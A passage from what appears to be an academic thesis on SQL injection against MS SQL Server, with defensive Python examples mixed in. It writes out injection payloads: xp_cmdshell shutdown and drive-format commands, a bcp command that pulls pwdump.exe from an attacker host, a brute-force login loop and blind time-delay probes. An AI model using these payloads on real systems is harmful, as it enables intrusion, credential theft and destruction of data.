select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789!_'
select @pwd_len = 8
select @username = 'sa'
while @i < @pwd_len begin
-- make pwd
(code deleted)
-- try a login
select @query = N'select * from OPENROWSET(''MSDASQL'',''DRIVER={SQL Server};SERVER=;uid=' + @username + N';pwd=' + @pwd + N''',''select @@version'')'
exec xp_execresultset @query, N'master'
--check for success
(code deleted)
-- increment the password
(code deleted)
end
There is one particular case of accessing remote data sources, and that is when the
sysadmin has created what is called a “Linked Server”. Linked servers are static
connections to other OleDb compliant data sources, containing connection
information such as the remote logon credentials, and exposed to the RDBMS as
an easy-to-use alias. If the attacker is lucky, it would be possible to determine,
using DDL statements, which linked servers were configured and exploit them as
well.
>
MICROSOFT ACTIVE DIRECTORY
Microsoft Active Directory, AD for short, is what enables user management on a
Windows-based network environment. It authenticates network users and
describes the organization by means of an LDAP-based directory. Though it is
more an application than a database, it exposes an OleDb provider for
interoperating with other data sources. So if a client application needed to search
for a network user, the AD could be queried as if it were a simple database, using
SELECT statements and WHERE clauses as in the following example:

Select adspath,samAccountName from 'LDAP://OU=PoC,DC=k2mega,DC=local'
Where objectClass='user' and DisplayName='hacker'
In order to execute this query against the AD from within the RDBMS, it is
necessary to use the AD OleDb provider, whether explicitly by means of the
OPENROWSET or OPENQUERY functions containing the OleDb provider, or
implicitly by means of a linked server. In the following set of examples, a linked
server is created and then a variety of AD operations are performed:
-- Modify the following queries to point to an OU in your Active Directory hierarchy
-- Add a linked server for the Active Directory
exec sp_addlinkedserver 'ADSI', 'Active Directory Services 2.5',
     'ADsDSOObject', 'adsdatasource'
-- Query for a list of Contact entries in an OU using the LDAP query dialect
select convert(varchar(50), [Name]) as FullName,
       convert(varchar(50), Title) as Title
from openquery(ADSI,
     '<LDAP://OU=Directors,OU=Atlanta,OU=Intellinet,DC=vizability,DC=intellinet,DC=com>;(objectClass=Contact);Name,Title;subtree')
-- Query for a list of User entries in an OU using the SQL query dialect
select convert(varchar(50), [Name]) as FullName,
       convert(varchar(50), Title) as Title,
       convert(varchar(50), TelephoneNumber) as PhoneNumber
from openquery(ADSI,
     'select Name, Title, TelephoneNumber
      from ''LDAP://OU=Directors,OU=Atlanta,OU=Intellinet,DC=vizability,DC=intellinet,DC=com''
      where objectClass = ''User''')
-- Query for a list of Group entries in an OU using the SQL query dialect
select convert(varchar(50), [Name]) as GroupName,
       convert(varchar(50), [Description]) as GroupDescription
from openquery(ADSI,
     'select Name, Description
      from ''LDAP://OU=VizAbility Groups,DC=vizability,DC=intellinet,DC=com''
      where objectClass = ''Group''')

The authentication mechanism for interfacing with the AD herein used is
Windows Integrated Authentication, meaning the network credentials used for
authenticating against the primary RDBMS, the one under attack, will be
propagated to reach the AD, hence the RDBMS is used as a Trojan horse. This is
the typical network deployment scenario as Microsoft endorses that Windows
integrated authentication is to be used whenever possible (Microsoft 6 A.D.b).
Figure 26 - Microsoft’s Endorsement of Windows Authentication
> adapted from (Microsoft 6 A.D.a) <
The queries shown in this example are standard AD queries anyone could execute
given the necessary changes of context. Piggy-backing these queries on a carrier
query, the modus operandi of SQL Injection, is only a matter of syntax, by no
means different from the simple examples shown previously.
The potential of interfacing, from within the RDBMS, with the application that
centralizes the authentication management of the entire corporate network’s
resources is enormous from a hacker’s perspective. Depending on the
policies adopted by the IT operations team and the principles upheld by the
software vendors and systems integrators, e.g. least privilege, secure by
default, etc., it is quite possible to create a user in the corporate
network directory and legitimately access network resources using a valid
account. All that with nothing more than a simple textbox on a Web page!

>
MICROSOFT EXCHANGE
Microsoft Exchange is the materialization of Microsoft’s vision for corporate
messaging and an important part of their overall strategy for enterprise
collaboration. MS Exchange, the server component, and MS Outlook, the client
piece, play an important role in contemporary organizations as they constitute a
key enabler of information worker empowerment. Like the AD, the
Exchange environment is a tempting target because of its corporate-wide role and
dominant market share.
Figure 27 - Corporate Messaging Software, IB Market Share, 2005
> adapted from (The Radicati Group 2006) <
[Pie chart: MS Exchange 57%; IBM Lotus Domino 35%; IBM Lotus Workplace 2%; Others 6%]
Like other applications, Exchange allows OleDb connections through the use of a
specific provider. Once there is an OleDb provider, interfacing with it from an
RDBMS is seamless, apart from the inherent specifics of the application’s
information structure. Again, if the organization fails to implement a strong set of
principles and policies, the Exchange platform could be compromised through the
use of a SQL Injection attack occurring on an RDBMS sitting on the network (see
Figure 6 - Typical Web Infrastructure Layout on page 34). The following examples
show a number of operations performed on Exchange via a MS SQL Server:

-- Add a linked server for the Exchange 2000 PF store
exec sp_addlinkedserver 'E2K_PF', 'Exchange OLE DB provider',
     'exoledb.DataSource.1',
     'file:\\.\backofficestorage\vizability.intellinet.com\public folders'
-- Query for a list of Contact entries in a PF
select convert(varchar(50), "urn:schemas:contacts:sn") as LastName,
       convert(varchar(50), "urn:schemas:contacts:givenName") as FirstName
from openquery(E2K_PF,
     'select "urn:schemas:contacts:sn", "urn:schemas:contacts:givenName"
      from scope(''shallow traversal of ".\Intellinet\Atlanta\Atlanta Contacts"'')')
-- Query for a list of appointment Calendar entries in a PF
select convert(varchar(50), "urn:schemas:httpmail:subject") as Subject,
       convert(varchar(50), "urn:schemas:calendar:dtstart") as StartDate
from openquery(E2K_PF,
     'select "urn:schemas:httpmail:subject", "urn:schemas:calendar:dtstart"
      from scope(''shallow traversal of ".\Intellinet\Atlanta\Atlanta Events"'')
      where "urn:schemas:calendar:alldayevent" = TRUE')
order by Subject, StartDate
-- Query for a list of all-day-event Calendar entries in a PF
select convert(varchar(50), "urn:schemas:httpmail:subject") as Subject,
       convert(varchar(50), "urn:schemas:calendar:dtstart") as StartDate
from openquery(E2K_PF,
     'select "urn:schemas:httpmail:subject", "urn:schemas:calendar:dtstart"
      from scope(''shallow traversal of ".\Intellinet\Atlanta\Atlanta Events"'')
      where "urn:schemas:calendar:alldayevent" = FALSE')
order by Subject, StartDate
-- Querying a Mailbox
-- Add a linked server for the Exchange 2000 mailbox
exec sp_addlinkedserver 'E2K_Administrator', 'Exchange OLE DB provider',
     'exoledb.DataSource.1',
     'file:\\.\backofficestorage\vizability.intellinet.com\MBX\Administrator'
-- Query for a list of appointment Calendar entries in the mailbox
select convert(varchar(50), "urn:schemas:httpmail:subject") as AppointmentName,
       convert(varchar(50), "urn:schemas:calendar:dtstart") as StartDate
from openquery(E2K_Administrator,
     'select "urn:schemas:httpmail:subject", "urn:schemas:calendar:dtstart"
      from scope(''shallow traversal of ".\Calendar"'')
      where "urn:schemas:calendar:alldayevent" = FALSE')

► Extending Beyond the RDBMS by Using Command Execution
Landsmann & Strömberg (2003) describe command execution as being «a method that
enables an attacker to execute SQL specific system commands through the RDBMS and
may even allow the attacker to take control over other host computers in the network».
The attacker can call system procedures that come with the RDBMS, or try to call stored
procedures that have been tailored by system developers, database administrators or
application programmers for the application.
Executing operating system commands is generally done through the use of
xp_cmdshell, a built-in extended stored procedure that allows the execution of arbitrary
command lines. Anley (2002a) defines extended stored procedures as being «essentially
compiled Dynamic Link Libraries (DLLs) (…) to allow SQL Server applications to have
access to the full power of C/C++, and are an extremely useful feature. A number of
extended stored procedures are built in to SQL Server, and perform various functions such
as sending email and interacting with the registry». Let’s consider some examples.
This sample code will display all files on the root of the C drive:
Exec Master..xp_cmdshell 'Dir C:\'
This sample code will shut down the server:
Exec Master..xp_cmdshell 'shutdown /s /f'
This sample code will create a VBScript file on the root of the C drive:
Exec Master..xp_cmdshell 'echo WScript.Echo "this could be used to create a user or escalating privileges" > C:\script.vbs'

But there are other interesting extended stored procedures that can tamper with the
operating system. Playing with the registry is one such method, which can be
achieved by a set of built-in extended stored procedures collectively named xp_regXXX:
• xp_regaddmultistring;
• xp_regdeletekey;
• xp_regdeletevalue;
• xp_regenumkeys;
• xp_regenumvalues;
• xp_regread;
• xp_regremovemultistring;
• xp_regwrite.
The following example will reveal all of the SNMP communities configured on the server.
Holding this information would enable an attacker to reconfigure network appliances in
the same area of the network, because SNMP communities tend to be infrequently
changed, and shared among many hosts (Anley 2002b):
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
There are many other interesting extended stored procedures available which could
directly or indirectly be used to affect the operating system hosting the RDBMS. The
following table mentions just a few worth looking at:

Name                  Description
xp_availablemedia     Reveals the available drives on the machine
xp_dirtree            Allows a directory tree to be obtained
xp_enumdsn            Enumerates ODBC data sources on the server
xp_loginconfig        Reveals information about the security mode of the server
xp_makecab            Allows the user to create a compressed archive of files on the
                      server (or any files the server can access)
xp_ntsec_enumdomains  Enumerates Windows domains that the server can access
xp_OAxxx              Enables consuming all ActiveX objects available to the
                      operating system, which allows virtually any operation
                      anyone could think of to be performed
xp_servicecontrol     Allows a user to start, stop, pause and resume services
xp_terminate_process  Terminates a process, given its process id (PID)
Table 2 - Handy Extended Stored Procedures in MS SQL Server 2000
> adapted from (Anley 2002b) <
► Uploading Files
Once an attacker has gained adequate privileges on the SQL Server, he may wish to
upload files to the server. Using the xp_cmdshell extended stored procedure it is possible
to create a text-based file, such as a VBScript. However, binary files such as executables
cannot be created in that fashion and must be uploaded. Since this cannot be done
using protocols such as SMB, the Windows protocol for network sharing, because ports
137-139 are typically blocked at the firewall, the attacker will need another method of getting
the binaries onto the victim’s file system. This can be done by uploading a binary file into
a table local to the attacker and then pulling the data to the victim’s file system using a
SQL Server connection (Cerrudo 2002).
Cerrudo (2002) proposes a clever approach to achieve this result. The process begins by
creating a table on the local server as follows:
create table AttackerTable (data text)
The attacker would then upload the binary into the table as follows:
bulk insert AttackerTable from 'pwdump.exe'
with (codepage='RAW')
The binary can then be downloaded to the victim server from the attacker’s server by
running the following SQL statement on the victim server:
exec xp_cmdshell 'bcp "select * from AttackerTable" queryout pwdump.exe -c -Craw -Shackersip -Usa -Ph8ck3r'
This statement will issue an outbound connection to the attacker’s server and write the
results of the query into a file, recreating the executable. In this case, the connection will
be made using the default protocol and port, which would likely be blocked by the
firewall. To circumvent the firewall, the attacker could try:
exec xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo',
'HackerSrvAlias','REG_SZ','DBMSSOCN,hackersip,80'

attack taxonomy •
And then:
The first SQL statement will configure a connection to the hacker’s server over port 80
while the second SQL statement will connect to the hacker’s server using port 80 and
download the binary file.
This method for uploading files uses many of the concepts described before and in reality
there is no limit for how complex it may get. Once the objectives are set-out, then it is
only a matter of craftsmanship to come up with a set of attack methods that can serve
the intended purposes.
4 Examining Prerequisites
Just by analysing the list of attack methods presented, it is possible to determine that
different SQL Injection attack methods have different prerequisites in order to be
carried-out. These can be related to query execution properties, or specific features
embedded on the RDBMS, or even the topology of the surrounding corporate network
environment. SQL Injection as a whole also depends on two prerequisites already pointed
out earlier: a carrier query is required in order to piggy-back malicious statements, and
injection attacks depend on the SQL dialect implemented by the underlying RDBMS.
Hence, prerequisites play an important role in the attack lifecycle. But the real issue
behind prerequisites is not if SQL Injection would be possible, but rather how easily this
task could be achieved (Landsmann & Strömberg 2003). Examining prerequisites will
serve to refine the choosing of attack methods and align their specific implementation
with the context of the IT environment under attack.
exec xp_cmdshell 'bcp "select * from AttackerTable" queryout pwdump.exe -c -Craw
-SHackerSrvAlias -Usa -Ph8ck3r'

4Subqueries
Sub-querying enables nesting of SQL statements and can offer a good alternative to
INNER JOINing ultra-large tables, as such a procedure introduces a major performance
penalty. Many Transact-SQL statements that include subqueries can alternatively be
formulated as joins. Other questions can be posed only with subqueries (Microsoft
2006). Subqueries are achieved by means of sub-selects, which are nothing more
than multiple SELECT statements used together. A top-level SELECT statement uses other
lower-level statements to retrieve values to be used in a WHERE clause, e.g.:
Select * from PurchaseOrderDetail where PurchaseOrderID in
(
Select PurchaseOrderID from PurchaseOrderHeader
Where ShipDate > dateadd(d,-2,getdate()) and Status=1
)
From a hacking perspective, sub-querying could offer the means to piggy-back a second
malicious query onto the carrier query. Let’s consider a previous example where the
following base query is the legitimate carrier wave used on a page that takes user input
in order to find a list of products:
Select * From Products Where Description Like '%<user input>%'
The hacker could manipulate the query into updating one record, for example, on a
remote data source, using a sub-select as in the following example after injection:
Select * From Products Where Description Like '%' and exists
(
select * from OPENROWSET('SQLOLEDB','remoteServer.Net';;,'select * from
AdventureWorks2000.dbo.Product Update AdventureWorks2000.dbo.product set
ListPrice=1 where [name]=''Digital Camera''')
) -- %'
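The legitimate use of a sub-select described in this topic can be tried out in isolation. What follows is only a minimal sketch, written in Python with the standard sqlite3 module rather than against MS SQL Server. The table and column names mirror the PurchaseOrder example, whereas the ProductName column, the sample rows, the cutoff date and the function names are assumptions made purely for illustration.

```python
import sqlite3


def build_demo_db():
    """Create an in-memory database with hypothetical sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE PurchaseOrderHeader (PurchaseOrderID INTEGER, ShipDate TEXT, Status INTEGER);
        CREATE TABLE PurchaseOrderDetail (PurchaseOrderID INTEGER, ProductName TEXT);
        INSERT INTO PurchaseOrderHeader VALUES
            (1, '2006-01-10', 1), (2, '2006-01-01', 1), (3, '2006-01-11', 2);
        INSERT INTO PurchaseOrderDetail VALUES
            (1, 'Digital Camera'), (2, 'Tripod'), (3, 'Lens');
    """)
    return conn


def recent_open_order_details(conn, cutoff):
    """Return detail rows whose header shipped after `cutoff` and has Status = 1."""
    sql = """
        SELECT PurchaseOrderID, ProductName
        FROM PurchaseOrderDetail
        WHERE PurchaseOrderID IN (
            -- The lower-level SELECT feeds values to the top-level WHERE clause.
            SELECT PurchaseOrderID
            FROM PurchaseOrderHeader
            WHERE ShipDate > ? AND Status = 1
        )
        ORDER BY PurchaseOrderID, ProductName
    """
    return conn.execute(sql, (cutoff,)).fetchall()
```

Calling recent_open_order_details(build_demo_db(), '2006-01-05') returns only the detail row of order 1, since order 2 shipped too early and order 3 has a different status.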

4JOIN
The JOIN clause makes it possible to combine information from multiple tables, including
tables from external data sources, and yield a consolidated resultset. Joins can be
categorized as (Microsoft 2006):
• Inner joins – the typical join operation, which uses some comparison operator
(like = or <>). These include equi-joins and natural joins. Inner joins use a
comparison operator to match rows from two tables based on the values in
common columns from each table. For example, retrieving all rows where the
student identification number is the same in both the students and courses
tables;
• Outer joins – can be a left, a right, or a full outer join. Outer joins are specified
with one of the following sets of keywords when they are specified in the
FROM clause:
- LEFT JOIN or LEFT OUTER JOIN
The result set of a left outer join includes all the rows from the left table
specified in the LEFT OUTER clause, not just the ones in which the joined
columns match. When a row in the left table has no matching rows in the
right table, the associated result set row contains null values for all select list
columns coming from the right table;
- RIGHT JOIN or RIGHT OUTER JOIN
A right outer join is the reverse of a left outer join. All rows from the right
table are returned. Null values are returned for the left table any time a right
table row has no matching row in the left table;
- FULL JOIN or FULL OUTER JOIN
A full outer join returns all rows in both the left and right tables. Any time a
row has no match in the other table, the select list columns from the other
table contain null values. When there is a match between the tables, the
entire result set row contains data values from the base tables;
• Cross joins – return every row from the left table combined with every row
from the right table. Cross joins are also called Cartesian products.
From a hacking perspective, JOINs can provide the means to access unintended
information sources and combine them on a single resultset.
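The difference between the join categories is easier to see on a tiny data set. The following sketch uses Python's standard sqlite3 module as a stand-in for MS SQL Server. The students and courses tables echo the example in the list above, while their columns, the sample rows and the function name join_demo are assumptions. RIGHT and FULL OUTER JOIN are left out because only recent SQLite releases support them.

```python
import sqlite3


def join_demo():
    """Run an inner, a left outer and a cross join over two small hypothetical tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE students (student_id INTEGER, name TEXT);
        CREATE TABLE courses  (student_id INTEGER, course TEXT);
        INSERT INTO students VALUES (1, 'Alice'), (2, 'Bob');
        INSERT INTO courses  VALUES (1, 'Databases'), (3, 'Networks');
    """)
    # Inner join: only rows whose student_id appears in both tables.
    inner = conn.execute("""
        SELECT s.name, c.course
        FROM students s INNER JOIN courses c ON s.student_id = c.student_id
        ORDER BY s.student_id
    """).fetchall()
    # Left outer join: every student, with NULL where no course matches.
    left = conn.execute("""
        SELECT s.name, c.course
        FROM students s LEFT OUTER JOIN courses c ON s.student_id = c.student_id
        ORDER BY s.student_id
    """).fetchall()
    # Cross join: every student combined with every course.
    cross_count = conn.execute(
        "SELECT COUNT(*) FROM students CROSS JOIN courses"
    ).fetchone()[0]
    return inner, left, cross_count
```

With two students and two courses, the cross join yields four rows, whereas the inner join yields a single row and the left outer join yields one row per student.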
4UNION
The UNION operator is probably one of the most powerful techniques for
combining information sources, as it merges the resultsets of multiple SELECT
queries into a single consolidated resultset. Let’s consider the above-mentioned
example of a carrier wave used on a page that takes user input in order to
find a list of products. The hacker could manipulate the query into returning additional
products, for example, held on a remote data source, using the UNION operator as in the
following example after injection:
Select * From Products Where Description Like '%'
UNION ALL
select * from OPENROWSET('SQLOLEDB','remoteServer.Net';;,'select * from
AdventureWorks2000.dbo.Product')
-- %'
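One property of UNION worth keeping in mind is that every SELECT being combined must return the same number of columns, otherwise the RDBMS rejects the statement. The sketch below illustrates this using Python's standard sqlite3 module instead of MS SQL Server. The two local tables merely stand in for a local and a remote source, and all table names, rows and the function name union_demo are hypothetical.

```python
import sqlite3


def union_demo():
    """Combine two resultsets with UNION ALL and probe a column-count mismatch."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE LocalProducts  (Name TEXT, ListPrice REAL);
        CREATE TABLE RemoteProducts (Name TEXT, ListPrice REAL);
        INSERT INTO LocalProducts  VALUES ('Tripod', 25.0);
        INSERT INTO RemoteProducts VALUES ('Digital Camera', 199.0);
    """)
    combined = conn.execute("""
        SELECT Name, ListPrice FROM LocalProducts
        UNION ALL
        SELECT Name, ListPrice FROM RemoteProducts
        ORDER BY Name
    """).fetchall()
    try:
        # Two columns on the left, one on the right: not a valid UNION.
        conn.execute(
            "SELECT Name, ListPrice FROM LocalProducts "
            "UNION ALL SELECT Name FROM RemoteProducts"
        )
        mismatch_rejected = False
    except sqlite3.OperationalError:
        mismatch_rejected = True
    return combined, mismatch_rejected
```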

4Multiple Statements
Multiple statements refers to the ability to execute several SQL statements in a single
request, where each statement is separated by a delimiter, e.g. a semicolon or the GO
separator. If, in the product search example, the hacker typed in
'; exec Master..xp_cmdshell 'format D: /q' --
then a second statement would be carried out after the first, causing the D drive, if
it exists, to be formatted. In client tools that recognize it, the GO batch separator serves
a similar purpose, although GO is interpreted by the client tool rather than by the
server itself.
4Comments
Many of the examples herein shown depend on “--”, SQL’s comment sign, at the end of
the query in order to discard the carrier query’s closing single quotation mark. The ability
to comment out parts of an SQL statement, meaning that the RDBMS will ignore
any SQL syntax that follows the comment symbol, provides for syntax
consistency after the carrier query has been injected.
4Error Messages
Error messages can provide invaluable information about a system’s inner structures and
about whether an injection attack is making progress, especially if error messages are
propagated all the way to the Web page. These can be raised by the RDBMS or by any
server-side script or program, or even by the injection itself as a means for outputting
information. The relevance of printed-out error messages was neatly demonstrated in
the «Real Environment Test» shown in the Experimenting chapter.

4Implicit Type Casting
Implicit type casting can happen at the RDBMS level as well as at the business layer level (see
Figure 8 - Classic Three-Tier Web Architecture Model on page 40). For example, several
RDBMSs support variable type conversion, allowing numeric values to be converted
automatically into a string type. For MS SQL Server, «implicit conversions are those
conversions that occur without specifying either the CAST or CONVERT function. Explicit
conversions are those conversions that require the CAST or CONVERT function to be
specified» (Microsoft 2006). An attacker could use type casting to his advantage and fool
the application and the underlying RDBMS. The following table shows all explicit and
implicit data type conversions that are allowed in MS SQL Server 2005:
Table 3 - Explicit and Implicit Type Conversions in MS SQL Server 2005
> adapted from (Microsoft 2006) <

4Variable Morphism
Variable morphism is closely related to implicit type casting, but it differs on a crucial
point. Whereas in implicit casting a variable’s type remains unaltered as it is strongly typed,
when variables allow morphism, instead of casting the value to the variable’s type, the
type of the variable changes to accommodate the type of the value. These types of
variables, also known as weakly typed, are commonplace across several scripting and
programming languages used in Web application development. Variable morphism can
be described as variables that can store data of arbitrary type. One good example is
VBScript’s variant type shown in this example:
Dim myVariable 'type still to be defined
myVariable = 32000
'It is now of type integer
myVariable = True
'It is now of type boolean
myVariable = "some text"
'It is now of type string
myVariable = "2006-01-01"
'It is still of type string
myVariable = CDate(myVariable)
'It is now of type Date thanks
'to an explicit conversion
Variable morphism can come in quite handy when manipulating numeric values.
Suppose that a Web page displays a grid with a list of products, rendering the
resultset of a query that received user input for performing a product search on
the database. It is very common to find implementations where the user is
expected to click the desired product to navigate to a page containing more detailed
information on that product. Quite often, the HTML link contains an explicit reference to
the product table primary key used for uniquely identifying the product, e.g.:

Figure 28 - Primary Key Information Exchanged via URL Querystring
This example demonstrates that behaviour: as the mouse hovers over a particular product, the
link on the status bar contains an explicit reference to the unique identifier of the
product, which will be passed on to a page named “ListProductSpecs.asp”. In such cases
of numeric values, tampering with the carrier query is fairly simple. Typically, the
implementation of the ASP page would look similar to this:
Dim PrdID, myQuery
PrdID = request.querystring("ProductID")
myQuery = "Select * from ProductSpecs Where ProductID=" & PrdID
Since the PrdID variable is not strongly typed, it could very well host a string type value,
hence simplifying the attacker’s life as he no longer has to worry about unclosed single
quotation marks from the carrier query. All it would take to inject another statement
would be something like this:
1; Drop Table Products
This example could also be successful if the application enforced strong types, such as a
Web application developed in C# using the ASP.NET 2.0 Framework. Although the
database expects an integer value for referencing the product, from within the Web
application a string-based SQL statement has to be built. Because of this fact, the Web
application will most certainly read the ProductID parameter as a string, thus enabling the
hacker to exploit this fact and forget all about escaping the single quotation marks of the
carrier query since there aren’t any. Numeric fields are therefore excellent entrypoints for
testing SQL Injection.
4Stored Procedures
Most of the examples shown while describing different attack methods relied on stored
procedures, namely, system stored procedures. Such procedures, supported by all
commercial RDBMSs, allow execution of system or database commands and SQL
subroutines in the RDBMS. The potential of these procedures is directly connected to the
functions they can perform. For this reason, the hacker must first determine which
RDBMS is being used by the application and be acquainted with the system stored
procedures that RDBMS exposes.
4String Concatenation for Building Dynamic SQL
The Web paradigm is all about one-to-one connections between parties; hence, the
experience a particular user undergoes does not necessarily have to be shared by others.
This is only possible due to the dynamic construction of SQL statements. The way this
construction occurs will determine the success of an eventual SQL Injection attack. If
developers use a string concatenation approach in order to build dynamic statements,
there is a pretty good chance the attacker can manipulate it to his advantage, whereas
using a parameterized approach makes things a whole lot more difficult. All the
examples shown so far rely on string concatenation when building statements, since this
is the most commonly used practice amongst developers. In the Defensive Tactics chapter
both techniques will be compared.
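The contrast between the two construction approaches can be sketched briefly. The example below is an illustration only, written in Python with the standard sqlite3 module rather than in ASP against MS SQL Server. The Products table echoes the product search example, while the sample rows and the function names make_db, search_concatenated and search_parameterized are assumptions.

```python
import sqlite3


def make_db():
    """Create an in-memory Products table with hypothetical rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Products (ProductID INTEGER, Description TEXT);
        INSERT INTO Products VALUES (1, 'Digital Camera'), (2, 'Tripod');
    """)
    return conn


def search_concatenated(conn, user_input):
    # Vulnerable pattern: the input becomes part of the SQL text itself.
    sql = ("SELECT ProductID FROM Products "
           "WHERE Description LIKE '%" + user_input + "%'")
    return sorted(conn.execute(sql).fetchall())


def search_parameterized(conn, user_input):
    # The SQL text is fixed; the input travels separately as a bound value.
    sql = "SELECT ProductID FROM Products WHERE Description LIKE ?"
    return sorted(conn.execute(sql, ("%" + user_input + "%",)).fetchall())
```

For an ordinary search term such as Camera both functions return the same row. For an input such as ' OR 1=1 -- the concatenated version returns every product, because the input rewrites the WHERE clause, whereas the parameterized version treats the whole input as a literal search string and finds nothing.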
4INTO
The INTO clause can be used to redirect query results to destinations other than
the regular query output stream. For example, the output of a SELECT statement could be
written into a table, rather than into the calling application’s buffer. The OUTFILE option,
available in dialects such as MySQL’s SELECT ... INTO OUTFILE, makes something a lot
more interesting possible: it writes the output to a file, which can be used to post
information on a Web server or to create a new secret ASPX page the hacker may use at will.
4Weak Policies and Principles
Principles and policies play an important role in defending against SQL Injection attacks.
Many of the examples herein shown could be prevented if, for example, the least
privilege principle were applied. The accounts defined in the database are the ones used
by database connections to access it, so an attacker can only use attack methods that
execute SQL statements covered by the privileges granted to the account used by the
application (Landsmann & Strömberg 2003). In the Defensive Tactics chapter this subject
will be properly addressed.

4 Poking for Vulnerabilities
Assessing which vulnerabilities are present will serve to steer the attack in terms of
determining if the prerequisites for specific attack methods are met, which in turn will
relate back to the attack objectives previously formulated.
4Unvalidated Input
Unvalidated input is in essence what makes SQL Injection possible. Unchecked
parameters to SQL queries that are dynamically built can be used in SQL Injection attacks.
These parameters may contain SQL keywords, e.g. INSERT, or SQL control characters such
as quotation marks and semicolons (Landsmann & Strömberg 2003). Determining where
and how user inputs are left unchecked is probably the hardest and most important step
of the whole attack lifecycle. This observation yields two action items the attacker must
attend to: the “where”, and the “how”.
The “where” part relates to applicational entrypoints; in other words, the attacker must
find, whether automatically or manually, which places in the application expect some
kind of user interaction and how these can be invoked. In a Web application, possible
entrypoints are all fields on a Web form, URL parameters, cookies and even HTTP
headers. As to the “how” part, the attacker’s experience plays an enormous role, as an
experienced analytical mind is required. Induction paves the way to solving the big
puzzle of understanding the runtime interactions of the application under attack. The
best analogy would be a researcher conducting action research.
Error messages and time delays are probably the best means to assess both the “where”
and the “how” action items. These will be described in the following topics.
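Seen from the defender's side, the list of entrypoints mentioned in this topic (form fields, URL parameters, cookies and HTTP headers) implies that each of them needs the same server-side check before its value gets anywhere near a query. The following Python sketch shows one possible allow-list check. The pattern, the 50-character limit and the function names are assumptions chosen for illustration, and only fields the application actually feeds into queries are expected to be passed in.

```python
import re

# Hypothetical allow-list: letters, digits, spaces and hyphens, 1 to 50 characters.
SEARCH_TERM = re.compile(r"[A-Za-z0-9 \-]{1,50}")


def is_acceptable(value):
    """True only when the whole value matches the allow-list pattern."""
    return isinstance(value, str) and SEARCH_TERM.fullmatch(value) is not None


def rejected_entrypoints(form, query, cookies, headers):
    """Return sorted (source, name) pairs whose value fails the allow-list."""
    sources = {"form": form, "query": query, "cookie": cookies, "header": headers}
    bad = []
    for source, fields in sources.items():
        for name, value in fields.items():
            if not is_acceptable(value):
                bad.append((source, name))
    return sorted(bad)
```

An allow-list of this kind is deliberately strict: anything containing quotation marks or semicolons is rejected regardless of which entrypoint carried it.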

4Error Message Feedback
Error messages that are generated by the RDBMS or by another server-side component may
be bubbled up to the client side and rendered in the Web browser without any kind of
alteration. While these messages can be useful during development for debugging
purposes, they can also constitute risks to the application since attackers may use them to
obtain information about database or script structure in order to construct their attack
(Landsmann & Strömberg 2003). Error messages may also reveal additional information
about the environment, or the database. For example, if a hacker attempts to convert a
string into an integer, the full contents of the string are returned in the error message
(Anley 2002b), e.g.:
select CreditCardHolder from CreditCards
UNION All
Select 1
Msg 245, Level 16, State 1, Line 1
Conversion failed when converting the nvarchar value 'John Doe' to data type
int.
This method could be very handy in determining, for example, the list of usernames in a
login table. Error messages can be used to render the results of an attack as well. The
example demonstrated in the «Real Environment Test» shown in the Experimenting
chapter uses an error message to render the list of files and directories on the root of the
C drive as part of a successful SQL Injection attack.
Error messages can also be useful in determining if a specific entrypoint is prone to SQL
Injection. In the same real example, the attack started by determining if the search
textbox was prone to SQL Injection by means of a single quotation mark raising a syntax
error.
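Since the risk described in this topic comes from raw error text reaching the browser, one common countermeasure is to log the detail on the server and return only a generic message. The sketch below assumes Python with the standard sqlite3 and logging modules instead of ASP and MS SQL Server. The logger name, the message text and the function name run_search are hypothetical. Note that hiding messages in this way does not remove the underlying injection flaw.

```python
import logging
import sqlite3

log = logging.getLogger("shop")  # hypothetical logger name

GENERIC_MESSAGE = "The request could not be completed."


def run_search(conn, sql, params=()):
    """Run a query; on failure log the detail and return only a generic message."""
    try:
        rows = conn.execute(sql, params).fetchall()
        return {"ok": True, "rows": rows}
    except sqlite3.Error as exc:
        # The database's own wording stays in the server-side log.
        log.error("query failed: %s", exc)
        return {"ok": False, "message": GENERIC_MESSAGE}
```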

4Time Delays
The expression «the sound of silence» is a good analogy for this technique. More
experienced developers will prevent runtime error messages from being shown to the
end-user. Many may do it on a pure usability basis, whereas others are aware that error
messages pose a security risk. Still, the attacker must have some kind of positive feedback
whenever he is poking around for vulnerabilities, or else it will be impossible to
assess if an attack is having any effect on a specific entrypoint. An ingenious workaround
is the use of time delays. The idea is simple: apart from an elite of mission-critical
applications, most user-interfacing applications, especially Web applications, have to deal
with somewhat generous latency times when interfacing across different functional
modules. Let’s consider the following injected statement:
'; waitfor delay '0:0:50' --
This statement will cause the server to put the current request to sleep for fifty seconds. If
a system usually responds in a second or two and now the response takes more than fifty
seconds, then the injection attack was almost certainly successful, even if no error
messages have been used to output any information.
For example, if the hacker wanted to determine if the current security context used by the
application to authenticate against the RDBMS is the sysadmin’s context, then this
statement would do the trick:
if (select user) = 'sa' waitfor delay '0:0:5'
There are other time delay statements that could be used, just in case someone is
watching for the use of WAITFOR:
exec xp_cmdshell N'ping -n 10 127.0.0.1'
This statement will use the standard network PING command to ping the LOCALHOST
for roughly ten seconds. Another, not so clean option would be to use a WHILE cycle to
increment an integer variable, but this approach could be perceived as a denial of service
attack as it would consume the server’s CPU processing time.
Here is a set of data manipulation examples that use this technique (Anley 2002a):
Does the 'pubs' sample database exist?
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'
Having run this:
create table pubs..tmp_file (is_file int, is_dir int, has_parent int)
and this:
insert into pubs..tmp_file exec master..xp_fileexist 'c:\boot.ini'
Are there any rows in the table?
if exists (select * from pubs..tmp_file) waitfor delay '0:0:5'
…and does that row indicate that the file exists?
if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5'

4Uncontrolled Variable Size
Variables that allow storage of data that is larger than expected may allow attackers to
enter modified or fabricated SQL statements (Landsmann & Strömberg 2003). In the
«Real Environment Test» shown in the Experimenting chapter, the field length of the
search textbox could not accommodate the length of the injected script. However, the
